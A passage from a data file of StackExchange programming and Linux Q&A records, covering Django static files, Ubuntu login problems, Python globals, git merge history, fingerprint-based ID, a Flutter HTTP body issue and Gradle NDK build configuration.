'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n]\n\nSTATICFILES_DIRS = [\n os.path.join(PROJECT_DIR, 'static'),\n]\n\nSTATICFILES_STORAGE = 'django.contrib.staticfiles.storage.ManifestStaticFilesStorage'\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\nSTATIC_URL = '\/static\/'\n\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = '\/media\/'\n<\/code>\nAnd in views.py I want to get some of the images inside static folder as follows:\n<code>for f in [\"static\/img\/logo\/contact-form\/logo_black.png\", \"static\/img\/logo\/contact-form\/logo_white.png\":\n fp = open(os.path.join(BASE_DIR, f), 'rb')\n msg_img = MIMEImage(fp.read())\n fp.close()\n msg_img.add_header('Content-ID', '<{}>'.format(f))\n msg.attach(msg_img)\n<\/code>\nBut I'm getting an error:\n<code>\"[Errno 2] No such file or directory: '\/Users\/Admin\/Projects\/web-dealers\/webDealers\/static\/img\/logo\/contact-form\/logo-black.png'\"\n<\/code>\nUPDATE\nThe urls.py is as follows:\n<code>urlpatterns = [\n url(r'^django-admin\/', admin.site.urls),\n\n url(r'^admin\/', include(wagtailadmin_urls)),\n url(r'^documents\/', include(wagtaildocs_urls)),\n\n url(r'^search\/$', search_views.search, name='search'),\n url(r'^api\/', include('API.urls')),\n url(r'^contact-us\/', contact_us, name=\"contact_us\"),\n\n # Languages\n url(r'^i18n\/', include('django.conf.urls.i18n'), name='set_language'),\n url(r'^jsi18n\/$', JavaScriptCatalog.as_view(), name='javascript-catalog'),\n\n # For anything not caught by a more specific rule above, hand over to\n # Wagtail's page serving mechanism. This should be the last pattern in\n # the list:\n url(r'', include(wagtail_urls)),\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n<\/code>\nWhat am I doing wrong?\nComment: you need to define them in urls to access them, or use external service like NGINX or Apache to serve them\nComment: @ruddra Check the updated question. They are defined in urls.\nComment: What is \"the rest of the code\"? In particular, how are you opening those files?\nComment: @DanielRoseman I've updated my question\nComment: Why do you include the \"static\" prefix and join with BASE_DIR? Why not `\"\/img\/logo\/contact-form\/logo_black.png\"` then join with STATIC_ROOT? Also note, STATIC_DIR should not be the same as STATICFILES_DIRS.\nComment: Might it be a problem with referring to static files in views. Check out [this question](https:\/\/stackoverflow.com\/a\/17738606\/216846) for discussion how to use static files in views.\nAnswer: Static in django are always tricky and a hell. I do not know why:) Don't you have <code>DEBUG=False<\/code> and forgot to do <code>python manage.py collectstatic<\/code>? \nHowever, this works for me:\n<code>settings.py<\/code>:\n<code>INSTALLED_APPS = [\n ...some other applications....\n\n 'django.contrib.staticfiles',\n\n ...some other applications....\n\n]\n\nSTATIC_URL = '\/static\/'\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static\/\")\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n<\/code>\nI do not have anything in <code>urls.py<\/code>. I can access static files normally like: e.g. <code>localhost:8000\/static\/image.png<\/code>.\nEDIT:\nIt seems that I did not read that properly and answered something different:) Your problem is not during the static files serving but when you access internally at the backend. It says: file not found. Are you sure that the path is correct? Or, that the <code>os.path.join(BASE_DIR', 'static')<\/code> really contains the file? You try to access the file using and absolut path so it must be easily verifiable is it is there or not at:\n<code>'\/Users\/Admin\/Projects\/web-dealers\/webDealers\/static\/img\/logo\/contact-form\/logo-black.png'\n<\/code>\n","meta":{"source":"stackoverflow","title":"Proper way to get images from Django static folder","dup_signals":{}},"subset":"stackexchange"} +{"text":"Problems with Desktop screen after login\n\nQuestion: I am running Ubuntu 14.04-64bit. I have a HP Pavilion dv7 laptop with a nVidia GEForce GT 650M video card. I am not using the nVidia drivers that are in \"synaptic\". This morning when I booted up, after I logged in, the desktop screen came up, but there was no \"task bar\" (I think that is what you call the bar at the top of the screen) & any program that was launched via the \"Startup Applications\" has no bar with the \"exit,minimize, whole scree\" buttons on it. I am able to kill any program using a terminal. The graphics is as it should be, no distortion. Now I rebooted, and this time, after the login screen, I just get a \"black\" screen. I was unable to get anything to respond, so I had to hit the power button in order to exit and try another reboot. Eventually, it all worked as it was suppose to, and I am now able to open any program and send this question to ya'll. I am not sure where to begin to figure out what has happened, and I have not tried another reboot to see if the problem is still there or gone. If I need to give you more info, please let me know what (an maybe how to get it) and I will respond ASAP. Thanks for your time looking at this, and I welcome any help you may be able to give.\nAnswer: Well, a little advice, a little help:\nUnresponsive system - here's a set of what you can try before resorting to the power button. One of the 'hidden' gems in here is holding the PrntScr and slowly typing \"reisub\"\nI have a dv7 also, and the heat generated by the machine is terrible. I've had to reflow the graphics chip down onto the motherboard twice, and when 14.04 came out, Ubunti could not recognize the graphics chip. I never did get the proprietary drivers to work with that machine.\nFor me on my Pavilion, the graphics solution is a launchapd PPA by Oibaf - these are open source drivers, a bit more advanced(?) than those packaged by canonical, and perhaps less stable, but they work in my HP.\nComment: I'll give it a try. Thanks, I'll let ya know what happens.\nComment: I'd be interested to know if the oibaf repository works as well for you as it does for me. I think the xorg-edgers repository is supposed to have greater performance, but is perhaps a little more risky.\nComment: Sorry that it has taken me so long to get back with you. The \"oibaf\" video drivers installed without a hitch. I don't really see any difference, but. It did not fix my problem. When I boot, it may take 3 or 4 boots to finally get to a screen that I can see my working desktop and etc. On the screens that just have the background image on, I am able to open 'guake\", and do 'sudo reboot\" which takes me back to a reboot, but after 3 or 4 times it finally gives me a working desktop. I am beginning to think I may just have to completely reload Ubuntu 14.04LTS-64.\nComment: Kind of sounds like it to me. Do you also have the non-free firmware loaded?\nComment: `sudo apt-get install linux-firmware-nonfree`\nComment: I went into 'synaptic' and looked up 'linux-firmware-nonfree', it says that I don't have that loaded. Is this software \"not good\" or should it be installed? Thanks for your comments and help, it has given me commands, things to do, to help me to try and solve my problem. I also noticed (by accident) that in the \"Software and Updates\" in synaptic, the 'update' page has 'pre-released updates (trusty-proposed) checked. Is that 'bad'?\nComment: The 'firmware' is a collection of code used by various device drivers, such as wireless interface cards. The 'nonfree' indicates that the source code for the drivers is not available - they are considered proprietary, although the compiled code is freely available. I think you may need them - hp has lots of funny little quirks that the nonfree drivers help with.\nComment: Thanks, I'll load them, reboot and see if it helps. Wish me luck. Thanks again. Will let you know results.\nComment: Well, the problem seems to have just gone away. I'm not really sure what did the trick. But, alls well.....so far. Thanks for your help\n","meta":{"source":"askubuntu","title":"Problems with Desktop screen after login","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I find out if the variable is declared in Python?\n\nQuestion: I want to use a module as a singleton referenced in other modules. It looks something like this (that's not actually a code I'm working on, but I simplified it to throw away all unrelated stuff):\nmain.py\n<code>import singleton\nimport printer\n\ndef main():\n singleton.Init(1,2)\n printer.Print()\n\nif __name__ == '__main__':\n pass\n<\/code>\nsingleton.py\n<code>variable1 = ''\nvariable2 = ''\n\ndef Init(var1, var2)\n variable1 = var1\n variable2 = var2\n<\/code>\nprinter.py\n<code>import singleton\n\ndef Print()\n print singleton.variable1\n print singleton.variable2\n<\/code>\nI expect to get output 1\/2, but instead get empty space. I understand that after I imported singleton to the print.py module the variables got initialized again.\nSo I think that I must check if they were intialized before in singleton.py:\n<code>if not (variable1):\n variable1 = ''\nif not (variable2)\n variable2 = ''\n<\/code>\nBut I don't know how to do that. Or there is a better way to use singleton modules in python that I'm not aware of :)\nAnswer: The assignment inside <code>Init<\/code> is forcing the variables to be treated as locals. Use the <code>global<\/code> keyword to fix this:\n<code>variable1 = ''\nvariable2 = ''\n\ndef Init(var1, var2)\n global variable1, variable2\n variable1 = var1\n variable2 = var2\n<\/code>\nAnswer: You can use de dictionaries vars and globals:\n<code>vars().has_key('variable1')\n<\/code>\nor\n<code>globals().has_key('variable1')\n<\/code>\nEdit:\nAlso...\n<code>'variable1' in vars()\n<\/code>\ne.g.\n<code>if not 'variable1' in vars():\n variable1 = ''\n<\/code>\n","meta":{"source":"stackoverflow","title":"How do I find out if the variable is declared in Python?","dup_signals":{}},"subset":"stackexchange"} +{"text":"ComboBoxEdit SelectedIndex always -1\n\nQuestion: When I set comboBoxEdit.selectedindex = some value, it never take this value. its value is always -1. I have set it in Constructor or in Form_Load.\n<code>if (oPersclientEntrp.TypPrint == 1) {\n comboBoxEdit_Print.SelectedIndex = 0;\n} else {\n comboBoxEdit_Print.SelectedIndex = 2;\n}\n<\/code>\nI have heard that The SelectedValue, SelectedIndex, SelectedItem properties can't be set until the control is added to the form. After the control is added to the form, the selectedValue, -Index and -Item properties can be set.\nbut I bind the value on design mode .\nComment: are you using DevExpress Controls??\nAnswer: Try updating your code to be this:\n<code>if (oPersclientEntrp.TypPrint == 1) { comboBoxEdit_Print.SelectedIndex = 0; }\nelse { comboBoxEdit_Print.SelectedIndex = 1; }\n<\/code>\nIf you only have 2 items, your <code>SelectIndex<\/code> should be 1, not 2.\nAnswer: You have 2 Items and the index of <code>SelectedIndex<\/code> starts with <code>0<\/code> (Because it access' an internal array, which of course starts with 0). So you have to edit your code to use index <code>0<\/code> instead of 1 and index <code>1<\/code> inseatd of <code>2<\/code>.\nBtw, this is a common behavior of the most <code>SelectedIndex<\/code> properties, i.e. of <code>TabControl<\/code>.\n","meta":{"source":"stackoverflow","title":"ComboBoxEdit SelectedIndex always -1","dup_signals":{}},"subset":"stackexchange"} +{"text":"Contents of UITextField and UITextView to NSString\n\nQuestion: I have a UITextView and 2 UITextField set up. UITextView resigns first responder status when empty part of the screen is tapped, the same for the 2 UITextField, plus for these 2, the return key also resigns first responder status. All 3 are declared in interface.\nI would like to get the contents of all of these to individual NSString and\/or learn how to enter them directly into something like:\n<code>NSString *urlstr = [[NSString alloc] initWithFormat:@\"http:\/\/server.com\/file.php?var1=%@&var2=%@&var3=%@\", *content of UITextView*, *content of UITextField*, *content of UITextField*];\n<\/code>\nThis is a very basic question, i know, but i'm pretty much a novice. If i learn how to do this i'll probably be able to pick up from there.\ncheers\n(edited)\nAnswer: UITextField and UITextView both have a <code>text<\/code> property that you can use to retrieve the string values. For example,\n<code>NSString *string = [NSString stringWithFormat:@\"%@, %@\", textField.text, textView.text];<\/code>\nKeep in mind you'll probably want to examine the strings to make sure they're not empty or contain invalid characters before putting them into a URL.\nAnswer: The accepted answer is good, I just wanted to add the following for an expanded look at grabbing text in iOS.\nSee the <code>textInRange:<\/code> aspect of the below code that I devised to use one function to determine the text whether it's a UITextField, UITextView or any other class that complies with the UITextInput protocol.\n<code>\/\/handle text container object length whether it's a UITextField, UITextView et al\nNSUInteger LengthOfStringInTextInput(NSObject<UITextInput> *textContainer)\n{\n UITextPosition *beginningOfDocument = [textContainer beginningOfDocument];\n UITextPosition *endOfDocument = [textContainer endOfDocument];\n UITextRange *fullTextRange = [textContainer textRangeFromPosition:beginningOfDocument \n toPosition:endOfDocument];\n return [textContainer textInRange:fullTextRange].length;\n}\n<\/code>\nBy changing the return type to NSString and removing .length you could have the functionality of the text property on any class.\n","meta":{"source":"stackoverflow","title":"Contents of UITextField and UITextView to NSString","dup_signals":{}},"subset":"stackexchange"} +{"text":"How should I fix this error in strcmp function?\n\nQuestion: I wrote a code to sort employee details in ascending order of employee names. I'm seeing an error in the strcmp function where it says \"<code>strcmp makes pointer from integer without a cast<\/code>\". I'm having trouble solving this, can someone please help me out? The type of sorting algorithm I used was insertion sort.\nEmployee details:\nname, ID, age, salary respectively\n<code>Tom 001 25 3000\nSam 002 28 5000\nKat 003 34 3000\nAlice 004 45 7000\nJohn 005 48 9000\nRick 006 29 5000\nGeorge 007 32 3200\nAnnie 008 44 5500\nLucas 009 56 4700\nMandy 010 37 7500\n<\/code>\n<code>void InsertionSort(employee array[], int size)\n{\n int j;\n for(int pass = 1; pass < size; pass++)\n {\n char temp_name[20];\n strcpy(temp_name, array[pass].name);\n int temp_age;\n int temp_ID;\n double temp_salary;\n \/\/traverse through sorted sublist\n for (j = pass - 1; strcmp(temp_name, array[j].name < 0) && j>=0; j--)\n {\n strcpy(array[j+1].name , array[j].name); \/\/right shifting\n array[j+1].age = array[j].age;\n array[j+1].ID = array[j].ID;\n array[j+1].salary = array[j].salary;\n }\n \/\/found the location to insert\n \/\/copy the temp value to correct location\n strcpy(array[j+1].name , temp_name);\n array[j+1].age = temp_age;\n array[j+1].ID = temp_ID;\n array[j+1].salary = temp_salary;\n }\n}\n<\/code>\nComment: This is a great example of why I don't like complex expressions inside the `for()` loop definition. What does `strcmp(temp_name , array[j].name <0)` mean? [Hint: `array[j].name <0` is always going to be `false` (unless array[j].name is null), so you're passing `false \/ 0` to `strcmp()`.]\nComment: @Kingsley I'm trying to see if the string value in temp_name is smaller than the string value in array[j].name. All the employee details have been stored in a struct array.\nComment: The loop will try to access `array[ -1 ].name`... That is one place to fix...\nAnswer: The first understanding of the strcmp() is required. Can check any example code or documentation on the internet. Can check this link .\nSo as parameters the strcmp() function takes two strings or two pointers to character. In the code strcmp(temp_name, array[j].name < 0) where array[j].name < 0 does not make any sense.\nThat's why the warning or error is \"strcmp makes pointer from integer without a cast\". The function expects a pointer but here it is something else.\nI assume you wanted to write strcmp(temp_name, array[j].name) < 0\n","meta":{"source":"stackoverflow","title":"How should I fix this error in strcmp function?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Google Structured Data Testing - The value provided for image.url must be a valid URL\n\nQuestion: Google structured data tester gives the following error for the <code>ImageObject<\/code> property. \n <code>The value provided for image.url must be a valid URL.<\/code>\n However, image URL exists and has no problem. Any idea? \nComment: Is the URL accessible publicly on the internet, or is it an internal\/private\/localhost address?\nComment: @MarkH. yes Mark, it is available publicly\nComment: Have you tried adding http and removing http delimiters in your Url? Some apps expect http, some do not\nAnswer: I am getting this error as well. I notice that Google structured data tester seems to have problems with image names containing .svg_ or .svg before the extension. e.g. 240px-Text-html_Gion.svg_.png or cloud.svg.jpg. When I truncate the image name to 240px-Text-html_Gion.png and use that image instead, it then works without error.\n","meta":{"source":"stackoverflow","title":"Google Structured Data Testing - The value provided for image.url must be a valid URL","dup_signals":{}},"subset":"stackexchange"} +{"text":"OpenCV Mat method \"at\" returning strange character in Linux\n\nQuestion: I am looking for a way to acces the value of the grayscale pixel in a cv::Mat object, I was able to find a lot of answers and I'm sure they worked, but for me they just don't do. So basically what I have is the following:\n<code> gray_image = imread(\"myimage.png\", CV_LOAD_IMAGE_GRAYSCALE);\n\n equalizeHist(gray_image, eq_image);\n\n \/\/ This line prints garbage\n const unsigned char* row = eq_image.ptr<unsigned char>(10);\n cout << row[10] << endl;\n\n \/\/ This line also prints garbage\n cout << eq_image.at<uchar>(10, 10) << endl;\n<\/code>\nI just want to see the grayscale[0,255] value of the pixel, in position (10,10). I'm pretty sure those 2 lines worked for some other people, but not for me, maybe it's a Linux thing.\nHow can I read the cv::Mat pixel in a grayscale integer ?\nThank you,\nAnswer: The value is printed as an ASCII character, that is depending on the actual value possibly non-printable garbage. If you are interested to print the pixel value as an integer number instead, you need to cast the value to an <code>int<\/code> to get the other operator<< overload:\n<code>cout << static_cast<int>(row[10]) << endl;\n<\/code>\n","meta":{"source":"stackoverflow","title":"OpenCV Mat method \"at\" returning strange character in Linux","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to find last merge in git?\n\nQuestion: For a web site, I have master and staging, I have worked on staging for about 10 days. How do I tell for sure what has changed since my last merge, or when that merge was? Most of the merges I have done end up being FFs so I can't log them like <code>git merge branch -m 'merging staging'<\/code> (git reports it ignored -m). I usually merge master into staging for testing before merging staging into master for more testing and deployment.\nI could tag each one but I'm worried about the clutter of doing that for merges. What I'd like to know is \"roughly, what changed since my last merge of staging into master?\" Then I could make sure I spent extra time investigating those changes in the final examination. Sometimes co-workers make changes I hadn't noticed until this stage.\nI suppose since staging->into->master merges are rare, I could tag them and then do a \"git whatchanged tag\" but I'm hoping there is a non-tag way to do it. Thanks.\nComment: That's why I always avoid fast-forward merges...\nComment: In general it's always best to merge the smallest thing that's what you want. This prevents you from ever ending up in a situation where, say, you merge master into a feature branch, and pull in all kinds of other stuff you don't actually need. It sounds like your situation is at relatively low risk of this... except your question is about being aware of all the changes that everyone has merged in, and [merging upstream](http:\/\/gitster.livejournal.com\/42247.html) is a good way to really know what you should have.\nComment: @CharlesB: How do I avoid them? If I'm on staging, do I avoid merging master into it, and only merge staging into master?\nComment: @CharlesB: ah, I see, --no-ff? I'll have to try that...\nComment: @Hans: In general, you don't want to merge master into other branches, but rather the other way around.\nComment: @Jefromi: I do this because we have been hotfixing things in a branch which we merge into master and publish. After doing a few of these, we merge master into any development\/staging branches. Would it be better to merge the hotfixes directly? And, what is better about it? Thanks.\nAnswer: <code>git log --merges -n 1\n<\/code>\nworks well. From <code>man git-log<\/code>:\n<code> --merges\n Print only merge commits. This is exactly the same as --min-parents=2.\n<\/code>\nHere's an example using <code>--pretty=format:\"%H\"<\/code> to get just the SHA.\n<code>$ git log --pretty=format:\"%H\" --merges -n 1\nf32e1f13eef7d5843e8063b8709d01af6dcd5dbf\n<\/code>\nCredit goes to Jefromi for their comment on another answer.\nComment: $ git show :\/^Merge --pretty=format:\"%H\" returns: 1a2ccd458d1f19167b9eb2ea11a70cccac6ba4d4\nAnswer: Try this, it will select the last branch where the commit message starts with \"Merge\":\n<code>git show :\/^Merge\n<\/code>\nHere's a website with a few git tips that might help you out.\nComment: I think what you really want to do is `git log --merges -n 1`. There's actually no guarantee that a merge commit has a commit message of this form, even though it's the default.\nComment: @alex, thanks for the answer. For some reason, if I'm on a non-master branch and I \"merge master\" into it, it logs a commit message, but if I'm on master and merge that branch (eg, staging), it doesn't, because it's a fast-forward.\nComment: That's awesome. I don't know how I missed that, looking around for hours, but that's what I wanted. Incidentally, I can't tell, does it show the ff merges? I want to know when I merged, so using --no-ff in master is probably still good, right?\nComment: Also: how can I show the branchname so it shows in gitk or terminal version of gitk (k = log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr, %cd) %C(bold blue)<%an>%Creset')? Does git store the branch name as it was when committed, or would I have to add that in the log msg?\nComment: @Hans: A fast-forward merge is not a merge commit, so no, `git log --merges` won't show it. The only record of a fast-forward merge is in the reflog; it's not a real tracked part of the repository in any way. If those fast-forwards are things you actually want to record permanently, then yes, you need to use `--no-ff` to force them to be recorded as merge commits.\nComment: @Hans: I'm not sure what you mean by \"show the branchname\". You mean the branch you merged into another? That's not really how git thinks: it merges *commits*. A branch is just a way to specify a commit. The default merge commit message (which is also generated when you use `--no-ff`) does include the merged branch name in its subject.\nAnswer: An alternative which does not rely on the content of the commit message:\n<code>$ git rev-list --min-parents=2 --max-count=1 HEAD\n9c6e6d6b6b9bd293335700e34e05217ae8e7a7e8\n<\/code>\n<code>--min-parents=2<\/code> selects only commits which are merges, <code>--max-count=1<\/code> only shows the first commit when going back in history. If the specified commit (<code>HEAD<\/code>) does not have any merge commits in its history, the output will be empty.\nAnswer: Looks like this is my best bet:\nI edited ~\/.gitconfig, adding:\n<code>[branch \"master\"]\n mergeoptions = --no-ff\n<\/code>\nThen if I'm on master and I merge in a branch, it shows it as a full merge. Having that as a config option for just \"master\" shows how awesome git is, so I can still FF merges within branches, where I'm likely to have a lot of short-lived topic branches, and I don't have to remember to specify --no-ff when merging on master. Beautiful.\nI use this alias for viewing logs:\nk = log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr, %cd) %C(bold blue)<%an>%Creset' --abbrev-commit\n<code>> git k (similar to the gui gitk, but stays in the terminal)\n<\/code>\nWhen I view logs that way, it paints a nice picture of the branching. If I want to find the last one, I can do \n<code>> git show :\/\"Merge branch 'staging'\"\n<\/code>\nThanks for the help.\nEDIT: As @jefromi noted in the comments to the first answer, this is probably a better technique <code>git log --merges -n 1<\/code>\nAnswer: It looks like you don't really want to know what is changed since last merge, but what have I on branch staging that is not yet on branch master? (or the other way around). If so, look at the command <code>git cherry<\/code>.\nThough I must confess I never used this command because of the output format, which is not really helpful. Maybe there is a way to feed this output to git log\/git show or such.\n\nEdit: As I understand, you don't need a tag to use <code>git whatchanged<\/code>. Try simply <code>git whatchanged master..staging<\/code> to see what changed on staging since you last merged from staging to master.\nComment: \u016dlo - that's another good one. For this question, not allowing FF merges in master and using good log output format helps me mostly -- as does the `git show:\/\"Merge\"` trick, but I've also been using `git log master..staging` which seems similar to `git whatchanged master..staging`\nAnswer: Why not simply diff your staging branch against master? That will show you the actual differences in each of your files, and not only those unmerged stuff. Also things you may have dropped when merging from staging to master in the past.\ntry <code>git diff master..staging<\/code>\nor <code>git diff master...staging<\/code> to see the diff from their common ancestor to 'staging'.\nAnswer: Take the latest merge and give branch name which merged to current branch\nMC=<code>git log --merges -n 1 | grep request<\/code>; BB=${MC##*:}; B=${BB%% }; SUBBRANCH=${B##\/}\necho $MC\n","meta":{"source":"stackoverflow","title":"How to find last merge in git?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using fingerprints everywhere to identify at physical, ID required, places\n\nQuestion: I was wondering why people can't just use fingerprints to retrieve all necessary documents where required.\nWhat would be the problem with such form of authentication, which could be used via fingerprint readers with screens, at all point where ID was required?\nAnswer: The question is pretty broad - talking about \"people\", \"documents\" and \"all point where ID was required\" without being more specific about the use cases.\nOne obvious obstacle to using the fingerprint is that it first would need to be recorded and associated with the person. Then this association would need to be made available wherever the identity needs to be checked. If it should be a replacement of the ID, then it cannot be just be embedded in the (physical or digital) ID, but has to be available in some huge database for online or offline access. This kind of data collection and data access is often seen as too much of a privacy invasion, at least in countries where the people have a say in decisions about such things.\nApart from that a fingerprint might not be reliable enough, i.e. the process has errors which depend on the technology (false positives and false negatives, ability to spoof) but might also be intensified with specific environmental conditions (moist, dirt, ...). And, fingers might actually be damaged (or even lost) in which case the method will no longer work. In other words: there needs to be an alternative way in case the fingerprint will not work and thus it cannot be a full replacement of the ID.\nFingerprints also provide limited security, depending on the balance chosen between false positives, false negatives, not working at all and the ability to spoof. Thus it might not be secure enough for all use cases, since different kinds of \"documents\" might require a different level of assurance of the identity of the user.\n","meta":{"source":"security.stackexchange","title":"Using fingerprints everywhere to identify at physical, ID required, places","dup_signals":{}},"subset":"stackexchange"} +{"text":"flutter http send empty body\n\nQuestion: this is what i tried:\n<code>Future<User> guestLogin(String deviceID) async {\n var body = {\n \"deviceid\": deviceID,\n };\n\n var bodyEncoded = json.encode(body);\n\n Response response = await client.post(\n \"$_baseURL\/api\/user\/guest\",\n body: bodyEncoded,\n headers: {\"Content-Type\": \"application\/json\"},\n );\n return User.fromJson(json.decode(response.body));\n} \n<\/code>\nbut when i check it from serverside which coded by golang then i see that the body is empty. when i try it on postman its working well. Where is the problem?\nComment: What's the response status?\nComment: @ClaudioRedi it's 200\nComment: What do you expect as body?\nComment: a user model. @ClaudioRedi . But flutter send post body as empty\nComment: Hard to tell from the code you show. Do you own the api to check why the response is empty?\nComment: @ClaudioRedi the response is empty because flutter is sending post body as empty as i send it from flutter code. so there is no problem on serverside cause when i call it from postman its working well. And i logged into golang then i see that body is empty.\nComment: Posted `body` can't be null according the code you show. Maybe `deviceid` is null or empty?\nComment: @ClaudioRedi no i have debugged it and its not empty.\nComment: Have you tried specifying the encoding inside the post? Like: `encoding: utf8`\nAnswer: try <code>jsonEncode(body)<\/code> instead of <code>json.encode(body)<\/code>\nComment: `jsonEncode(body)` and `json.encode(body)` are exactly the same @Ali G\u00fcrelli.... look at the definition https:\/\/api.dart.dev\/stable\/2.9.0\/dart-convert\/jsonEncode.html\n","meta":{"source":"stackoverflow","title":"flutter http send empty body","dup_signals":{}},"subset":"stackexchange"} +{"text":"build gradle fail with \"no signature of method .... is applicable for argument types: (java.lang.String) values\"\n\nQuestion: I have 4 gradle build files: when I build in android studio I am constantly having the error: \n\nNo signature of method:\n org.gradle.model.ModelMap.getDefaultProguardFile() is applicable for\n argument types: (java.lang.String) values: [proguard-android.txt]\n\nfile 1\n<code>\/\/ Top-level build file where you can add configuration options common to all sub-projects\/modules.\n\nbuildscript {\n repositories {\n jcenter()\n }\n dependencies {\n classpath 'com.android.tools.build:gradle-experimental:0.9.3'\n \/\/ NOTE: Do not place your application dependencies here; they belong\n \/\/ in the individual module build.gradle files\n }\n}\n\nallprojects {\n repositories {\n jcenter()\n }\n}\n\ntask clean(type: Delete) {\n delete rootProject.buildDir\n}\n<\/code>\nfile 2\n<code>apply plugin: 'com.android.model.native'\n\nmodel {\n android {\n compileSdkVersion = 25\n buildToolsVersion = '25.0.0'\n\n defaultConfig {\n minSdkVersion.apiLevel = 17\n targetSdkVersion.apiLevel = 25\n versionCode = 1\n versionName = '1.0'\n }\n ndk {\n moduleName = 'fpextractor'\n platformVersion = 17\n toolchain = \"clang\"\n stl = 'gnustl_static' \/\/std::mutex not in gnustl_static\n cppFlags.add('-std=c++11')\n abiFilters.addAll(['armeabi', 'armeabi-v7a', 'x86'])\n \/\/abiFilters.addAll(['armeabi', 'armeabi-v7a', 'arm64-v8a', 'x86', 'x86_64', 'mips', 'mips64']) \/\/this is default\n \/\/abiFilters.addAll(['armeabi'])\n ldLibs.addAll(['android', 'log', 'atomic', 'z'])\n }\n }\n}\n\n\/\/ This is just copy out the header file and built lib into distribution\n\/\/ directory for clint application to use; it is a small overhead of this sample:\n\/\/ both lib and app are put inside one project space [save maintenance time]\ntask(distributeLib, type : Copy) {\n \/\/ trigger build library\n dependsOn assemble\n into '..\/distribution\/fpextractor\/'\n from('src\/main\/jni\/fp_extractor.h') {\n into 'include\/'\n }\n from('build\/outputs\/native\/release\/lib') {\n into 'lib\/'\n }\n}\n<\/code>\nfile 3\n<code>apply plugin: 'com.android.model.native'\n\nmodel {\n android {\n compileSdkVersion = 25\n buildToolsVersion = '25.0.0'\n\n defaultConfig {\n minSdkVersion.apiLevel = 17\n targetSdkVersion.apiLevel = 25\n versionCode = 1\n versionName = '1.0'\n }\n ndk {\n moduleName = 'nativeaudio'\n platformVersion = 17\n toolchain = \"clang\"\n stl = 'gnustl_static' \/\/std::mutex not in gnustl_static\n cppFlags.add('-std=c++11')\n abiFilters.addAll(['armeabi', 'armeabi-v7a', 'x86'])\n \/\/abiFilters.addAll(['armeabi', 'armeabi-v7a', 'arm64-v8a', 'x86', 'x86_64', 'mips', 'mips64']) \/\/this is default\n \/\/abiFilters.addAll(['armeabi-v7a'])\n ldLibs.addAll(['android', 'log', 'OpenSLES', 'atomic'])\n }\n }\n}\n\n\/\/ This is just copy out the header file and built lib into distribution\n\/\/ directory for clint application to use; it is a small overhead of this sample:\n\/\/ both lib and app are put inside one project space [save maintenance time]\ntask(distributeLib, type : Copy) {\n \/\/ trigger build library\n dependsOn assemble\n into '..\/distribution\/nativeaudio\/'\n from('src\/main\/jni\/buf_manager.h') {\n into 'include\/'\n }\n from('src\/main\/jni\/android_debug.h') {\n into 'include\/'\n }\n from('src\/main\/jni\/debug_utils.h') {\n into 'include\/'\n }\n from('src\/main\/jni\/audio_common.h') {\n into 'include\/'\n }\n from('src\/main\/jni\/audio_recorder.h') {\n into 'include\/'\n }\n from('build\/outputs\/native\/release\/lib') {\n into 'lib\/'\n }\n}\n<\/code>\nfile 4\n<code>apply plugin: 'com.android.model.application'\n\n\/\/ Root of 3rd party lib(s): location could be anywhere on the host system\ndef lib_distribution_root = '..\/distribution'\nmodel {\n repositories {\n libs(PrebuiltLibraries) {\n \/\/ Configure one pre-built lib: shared\n nativeaudio {\n \/\/ Inform Android Studio where header file dir for this lib\n headers.srcDir \"${lib_distribution_root}\/nativeaudio\/include\"\n \/\/ Inform Android Studio where lib is -- each ABI should have a lib file\n binaries.withType(SharedLibraryBinary) {\n sharedLibraryFile = file(\"${lib_distribution_root}\/nativeaudio\/lib\/${targetPlatform.getName()}\/libnativeaudio.so\")\n }\n }\n fpextractor {\n \/\/ Inform Android Studio where header file dir for this lib\n headers.srcDir \"${lib_distribution_root}\/fpextractor\/include\"\n \/\/ Inform Android Studio where lib is -- each ABI should have a lib file\n binaries.withType(SharedLibraryBinary) {\n sharedLibraryFile = file(\"${lib_distribution_root}\/fpextractor\/lib\/${targetPlatform.getName()}\/libfpextractor.so\")\n }\n }\n \/\/ Configure another pre-built lib: shared;[change to static after Studio supports]\n \/\/ static lib generation. USING static lib is supported NOW, for that case,\n \/\/ simple change:\n \/\/ SharedLibaryBinary --> StaticLibraryBinary\n \/\/ sharedLibraryFile --> staticLibraryFile\n \/\/ *.so --> *.a\n \/\/gperf {\n \/\/ headers.srcDir \"${lib_distribution_root}\/gperf\/include\"\n \/\/ binaries.withType(SharedLibraryBinary) {\n \/\/ sharedLibraryFile = file(\"${lib_distribution_root}\/gperf\/lib\/${targetPlatform.getName()}\/libgperf.so\")\n \/\/ }\n \/\/}\n }\n }\n android {\n compileSdkVersion = 25\n buildToolsVersion = '25.0.0'\n\n defaultConfig {\n applicationId='com.gfk.mediawatchapp'\n minSdkVersion.apiLevel = 17\n targetSdkVersion.apiLevel = 25\n versionCode = 22\n versionName = '255.0.4'\n \/\/ Enabling multidex support.\n \/\/multiDexEnabled true\n }\n ndk {\n platformVersion = 17\n moduleName = 'mwlib'\n toolchain = \"clang\"\n stl = 'gnustl_static'\n cppFlags.add('-std=c++11')\n ldLibs.addAll(['android', 'log', 'OpenSLES', 'atomic'])\n \/\/build a default combined apk including all ABIs.\n \/\/abiFilters.addAll(['armeabi-v7a'])\n abiFilters.addAll(['armeabi', 'armeabi-v7a', 'x86']) \/\/this is default\n }\n sources {\n main {\n jni {\n dependencies {\n library 'nativeaudio' linkage 'shared'\n library 'fpextractor' linkage 'shared'\n \/\/ if gperf were *.a, change shared --> static\n \/\/library 'gperf' linkage 'shared'\n }\n }\n jniLibs {\n \/\/ for shared lib, lib need to be pushed to the target too\n \/\/ Once libs are copied into 